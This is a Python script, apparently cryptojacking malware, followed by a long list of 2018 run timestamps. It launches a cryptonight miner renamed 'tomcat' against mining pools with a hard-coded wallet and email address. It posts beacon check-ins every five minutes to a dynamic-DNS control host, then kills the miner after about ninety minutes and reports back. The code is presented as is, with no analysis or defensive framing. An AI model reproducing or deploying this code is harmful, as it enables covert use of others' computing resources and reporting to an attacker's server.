import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:16:01.610324
#2018-02-17 16:03:04.945061
#2018-02-17 17:51:01.488801
#2018-02-17 19:37:06.664449
#2018-02-17 21:27:06.464249
#2018-02-17 23:11:06.846198
#2018-02-18 00:58:01.483341
#2018-02-18 02:46:05.466458
#2018-02-18 04:36:05.249145
#2018-02-18 06:27:05.211986
#2018-02-18 08:16:01.798715
#2018-02-18 10:04:05.323131
#2018-02-18 11:50:04.439299
#2018-02-18 13:35:01.426294
#2018-02-18 15:25:05.925502
#2018-02-18 17:13:04.286885
#2018-02-18 19:00:10.665110
#2018-02-18 20:47:02.064483
#2018-02-18 22:34:03.917751
#2018-02-19 00:22:06.152667
#2018-02-19 02:08:04.383565
#2018-02-19 03:54:05.816713
#2018-02-19 05:38:07.747547
#2018-02-19 07:27:05.158406
#2018-02-19 09:17:07.020759
#2018-02-19 11:06:08.399719
#2018-02-19 12:53:04.248838
#2018-02-19 14:41:01.326602
#2018-02-19 16:28:07.880533
#2018-02-19 18:15:06.244845
#2018-02-19 20:02:07.721134
#2018-02-19 21:52:01.260027
#2018-02-19 23:38:07.435170
#2018-02-20 01:24:05.273267
#2018-02-20 03:14:05.752974
#2018-02-20 05:03:05.227318
#2018-02-20 06:45:06.989872
#2018-02-20 08:32:06.005981
#2018-02-20 10:16:04.272129
#2018-02-20 12:01:05.063652
#2018-02-20 13:48:09.226398
#2018-02-20 15:27:08.194246
#2018-02-20 17:12:08.359686
#2018-02-20 19:01:07.439722
#2018-02-20 20:50:04.643585
#2018-02-20 22:34:05.519480
#2018-02-21 00:14:07.630059
#2018-02-21 01:59:01.387524
#2018-02-21 03:47:07.277090
#2018-02-21 05:36:07.000629
#2018-02-21 07:24:05.054233
#2018-02-21 09:08:07.788238
#2018-02-21 10:57:07.081799
#2018-02-21 12:42:07.164129
#2018-02-21 14:31:08.734681
#2018-02-21 16:18:09.033619
#2018-02-21 18:08:08.870190
#2018-02-21 19:54:08.738081
#2018-02-21 21:42:07.675566
#2018-02-21 23:31:01.638810
#2018-02-22 01:18:06.554888
#2018-02-22 03:07:06.484163
#2018-02-22 04:51:06.489461
#2018-02-22 06:35:09.140339
#2018-02-22 08:23:04.164826
#2018-02-22 10:11:08.805631
#2018-02-22 11:57:01.961684
#2018-02-22 13:42:09.025698
#2018-02-22 15:31:04.926791
#2018-02-22 17:17:01.687269
#2018-02-22 19:03:09.247941
#2018-02-22 20:54:01.861711
#2018-02-22 22:39:07.089098
#2018-02-23 00:26:07.742590
#2018-02-23 02:13:06.137943
#2018-02-23 04:02:08.143216
#2018-02-23 05:47:04.795036
#2018-02-23 07:39:05.159863
#2018-02-23 09:42:05.213356
#2018-02-23 11:46:01.790771
#2018-02-23 13:36:03.811905
#2018-02-23 15:23:08.393505
#2018-02-23 17:09:08.952539
#2018-02-23 18:55:04.086732
#2018-02-23 20:41:08.671697
#2018-02-23 22:27:03.937016
#2018-02-24 00:12:07.415226
#2018-02-24 02:06:07.880970
#2018-02-24 03:37:03.954524
#2018-02-24 05:09:04.369615
#2018-02-24 06:40:05.470792
#2018-02-24 08:18:05.557486
#2018-02-24 09:47:02.219018
#2018-02-24 11:31:03.702713
#2018-02-24 12:58:03.583508
#2018-02-24 14:31:07.144907
#2018-02-24 16:01:06.222570
#2018-02-24 17:43:07.168886
#2018-02-24 19:16:05.935628
#2018-02-24 20:51:05.281942
#2018-02-24 22:40:03.198238
#2018-02-25 01:05:07.256670
#2018-02-25 03:01:06.168154
#2018-02-25 06:47:01.370556